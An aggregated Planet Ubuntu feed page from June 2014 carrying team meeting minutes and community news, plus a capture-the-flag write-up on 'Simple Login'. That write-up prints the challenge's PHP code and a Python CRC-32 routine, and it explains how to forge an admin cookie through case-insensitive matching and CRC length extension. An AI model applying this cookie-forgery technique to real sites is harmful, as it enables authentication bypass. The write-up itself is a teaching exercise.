Planet Ubuntu - Wed, 2014-06-04 13:44

This is really inspiring to me, on several levels: as an Ubuntu member, as a Canonical, and as a school governor.

Not only are they deploying Ubuntu and other open-source software to their students, they are encouraging those students to tinker with their laptops, and – better yet – some of those same students are directly involved in the development, distribution, and providing support for their peers. All of those students will take incredibly valuable experience with them into their future careers.

Well done.

The post Enabling Students in a Digital Age: Charlie Reisinger at TEDxLancaster appeared first on David Murphy.

David Tomaschik: Secuinside Quals 2014: Simple Login

Planet Ubuntu - Wed, 2014-06-04 02:08

In this challenge, we received the source for a site with a pretty basic login functionality. Aside from some boring forms, javascript, and css, we have this PHP library for handling the session management:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50<? class common{ public function getidx($id){ $id = mysql_real_escape_string($id); $info = mysql_fetch_array(mysql_query("select idx from member where id='".$id."'")); return $info[0]; } public function getpasswd($id){ $id = mysql_real_escape_string($id); $info = mysql_fetch_array(mysql_query("select password from member where id='".$id."'")); return $info[0]; } public function islogin(){ if( preg_match("/[^0-9A-Za-z]/", $_COOKIE['user_name']) ){ exit("cannot be used Special character"); } if( $_COOKIE['user_name'] == "admin" ) return 0; $salt = file_get_contents("../../long_salt.txt"); if( hash('crc32',$salt.'|'.(int)$_COOKIE['login_time'].'|'.$_COOKIE['user_name']) == $_COOKIE['hash'] ){ return 1; } return 0; } public function autologin(){ } public function isadmin(){ if( $this->getidx($_COOKIE['user_name']) == 1){ return 1; } return 0; } public function insertmember($id, $password){ $id = mysql_real_escape_string($id); mysql_query("insert into member(id, password) values('".$id."', '".$password."')") or die(); return 1; } } ?>

Some first impressions:

  • MySQL calls seem to be properly escaped.
  • The auth cookie is using the super-weak crc32.
  • Setting the user_name cookie to 'admin' won't work out for us.

In index.php, we see:

1 2 3if($common->islogin()){ if($common->isadmin()) $f = "Flag is : ".__FLAG__; else $f = "Hello, Guest!";

So, presumably, the correct user is actually 'admin', but we can't log in as that. So what to do? Well, after playing around for a bit, I realized one important point. By default, MySQL uses case-insensitive string comparisons but, of course, PHP's == operator is case-sensitive. So a mixed-case version of admin will pass the test in islogin() but will return the user we want in getidx(), but we can't log in as any variation of admin as the password will still be needed.

That brings us to the hash. Perhaps we could fake the hash for an uppercased admin user? While we could probably brute force the salt, that would take a while. However, crc32 is vulnerable to trivial hash length extension attacks, if you can set the internal state to an existing hash. That is: crc32(a+b) == crc32(b, crc32(a)). So, since the salt is at the beginning, if we have the crc32 for a user, we can easily concatenate anything on the end and still generate a valid hash. (Assuming an implementation of crc32 that allows you to set the existing internal state.)

One rub: while python allows you to set the state, it doesn't implement the same CRC-32 as PHP! (I thought there was only one CRC-32, but apparently the one in python's binascii and zlib modules is the zlib CRC-32, and the PHP hash one is the bz2 CRC-32.) So I was able to find the relevant lookup table for the BZ2 crc-32 and write this implementation:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18import struct crc_table = [ 0x00000000L, 0x04c11db7L, 0x09823b6eL, 0x0d4326d9L, ...snip... 0xbcb4666dL, 0xb8757bdaL, 0xb5365d03L, 0xb1f740b4L ] def bzcrc(s, init=None): if init: state = struct.unpack('>I', struct.pack('<I', ~init & 0xffffffff))[0] else: state = 0xffffffff for c in s: state = state & 0xffffffff state = ((state << 8) ^ (crc_table[(state >> 24) ^ (ord(c))])) return hex(struct.unpack('>I', struct.pack('<I', ~state & 0xffffffff))[0])

And yes, I do some weird stuff with byte-order swapping, but it works for the one off. So, we logged in as the user 'a', got a hash, then changed the user_name cookie to aDMIN, and calculated the new hash via: bzcrc('DMIN', <existing hash>). Updated the hash cookie, refresh, and we've got a flag.

Ubuntu Server blog: Meeting Minutes: June 3rd, 2014

Planet Ubuntu - Tue, 2014-06-03 19:27
Agenda
  • Review ACTION points from previous meeting
  • U Development
  • Server & Cloud Bugs (caribou)
  • Weekly Updates & Questions for the QA Team (psivaa)
  • Weekly Updates & Questions for the Kernel Team (smb, sforshee)
  • Ubuntu Server Team Events
  • Open Discussion
  • Announce next meeting date, time and chair
Minutes
  • vUDS is next week (Tues-Thurs) – Pat (gaughen) is still working on topics, so if someone has a suggestion please talk to her.
  • bug 1319555 should not be on the list – list needs refreshing
  • bug 1315052 has fix committed upstream
  • bug 1317587 is in progress
  • The team is working on getting the blueprints filled out completely.  Expecting them to be solidified around vUDS.
  • Louis (caribou) created blueprint: https://blueprints.launchpad.net/ubuntu/+spec/servercloud-u-networked-kdump and working on getting it filled in and approved.
  • kdump may be added to vUDS agenda
  • There’s an Openstack meetup in London on Thursday – James (jamespage) and Liam (gnuoy) are attending.  http://www.eventbooking.uk.com/openstack/home.html
Next Meeting

Next meeting will be on Tuesday, June 10th at 16:00 UTC in #ubuntu-meeting.

Additional logs @ https://wiki.ubuntu.com/MeetingLogs/Server/20140603

Ubuntu Kernel Team: Kernel Team Meeting Minutes – June 03, 2014

Planet Ubuntu - Tue, 2014-06-03 17:13
Meeting Minutes

IRC Log of the meeting.

Meeting minutes.

Agenda

20140603 Meeting Agenda


ARM Status

No new update this week.


Release Metrics and Incoming Bugs

Release metrics and incoming bug data can be reviewed at the following link:

http://people.canonical.com/~kernel/reports/kt-meeting.txt


Milestone Targeted Work Items    apw    core-1405-kernel    2 work items       ogasawara    core-1405-kernel    2 work items   


Status: Utopic Development Kernel

We have most recently rebased our Utopic kernel to v3.15-rc8 and
uploaded (3.15.0-5.10). We are planning on converging on the v3.16
kernel for Utopic. It also appears that the Utopic release date has
been pushed out a week to Thurs Oct 23 in order to not conflict with
the Linux Plumbers Conference.
—–
Important upcoming dates:
Mon-Wed June 10 – 12, UOS – Ubuntu Online Summit (~1 week away)
Thurs Jun 26 – Alpha 1 (~3 weeks away)
Fri Jun 27 – Kernel Freeze for 12.04.5 and 14.04.1 (~3 weeks away)


Status: CVE’s

The current CVE status can be reviewed at the following link:

http://people.canonical.com/~kernel/cve/pkg/ALL-linux.html


Status: Stable, Security, and Bugfix Kernel Updates – Trusty/Saucy/Precise/Lucid

Status for the main kernels, until today (June 3):

  • Lucid – Verification and Testing
  • Precise – Verification and Testing
  • Quantal – No changes this cycle
  • Saucy – Verification and Testing
  • Trusty – Verification and Testing

    Current opened tracking bugs details:

  • http://people.canonical.com/~kernel/reports/kernel-sru-workflow.html

    For SRUs, SRU report is a good source of information:

  • http://people.canonical.com/~kernel/reports/sru-report.html

    Schedule:

    cycle: 18-May through 07-Jun
    ====================================================================
    16-May Last day for kernel commits for this cycle
    18-May – 24-May Kernel prep week.
    25-May – 31-May Bug verification & Regression testing.
    01-Jun – 07-Jun Regression testing & Release to -updates.


Open Discussion or Questions? Raise your hand to be recognized

No open discussions.

David Planella: A new era for the Ubuntu community team, or business as usual

Planet Ubuntu - Tue, 2014-06-03 17:06

A sample of the wider Ubuntu Community team, with Canonicalers and volunteer core app developers

After the recent news of Jono stepping down as the Ubuntu Community Manager to seek new challenges at XPRIZE, a new era in Ubuntu begins. Jono’s leadership, passion and drive to continually push the boundaries have been contagious over the years, and have been the catalyst for growing the unique community of individuals that defines Ubuntu today.

Jono is now joining the ranks of non-Canonical Ubuntu members, and while this will change the angle of participation, I’m certain that it won’t change his energy and dedication one bit. But most importantly, it’s a testament to his work that his former team will continue to thrive and take up the torch in pushing those boundaries.

For us, it will be business as usual in the sense of implementing our roadmap, continuing to grow a strong and open community, being innovative in how we do it, and coordinating the logistics around our plans. So not much will be different in that regard, but obviously some organizational bits will change.

As part of the transition, the Ubuntu Community Team at Canonical in full, that is, Michael Hall, Daniel Holbach, Alan Pope, Nicholas Skaggs and myself, will now be hosting the weekly Ubuntu Q&A, starting today at 18:00 UTC on Ubuntu On Air (click here for the time at your location).

The Ubuntu Community Team Q&A

Openness, both in being a transparent and welcoming community, is one of the core values of Ubuntu, and we believe the channels should be always open for a healthy information flow and to help contributors get involved.

As such, the Ubuntu Community Team Q&A will continue to provide a weekly, 1-hour-long session open for participation to anyone who wants to ask their questions about Ubuntu. In fact, as in former editions, you can ask the Community Team just anything about Free Software, Technology, or whatever you come up with. As before, the only questions we won’t answer are those related to technical support, where you’ll be much better served using Ask Ubuntu, the Ubuntu forums or IRC.

Join the Ubuntu Community Team Q&A at 18:00 UTC today and ask your questions >

The Ubuntu Online Summit is coming soon!

Also, following the thread of events and participation, the new Ubuntu Online Summit (UOS) is coming up very soon, and it’s an excellent opportunity to learn about getting involved in Ubuntu, organizing or presenting the plans of the different Ubuntu teams for the next months.

UOS will be held on June 10th – 12th and it will be a combination of the former Ubuntu Developer Summit and the more user-facing events we’ve been organizing in the past. This opens the door to a wider audience that can follow a richer mix of developer and user or contributor content.

If you want to learn about the details, check out Michael’s UOS post on how it’s going to work. If you want to contribute and make a difference in Ubuntu, do register a session too!

Looking forward to seeing you soon!

The post A new era for the Ubuntu community team, or business as usual appeared first on David Planella.

Pages

Subscribe to Free Software Magazine aggregator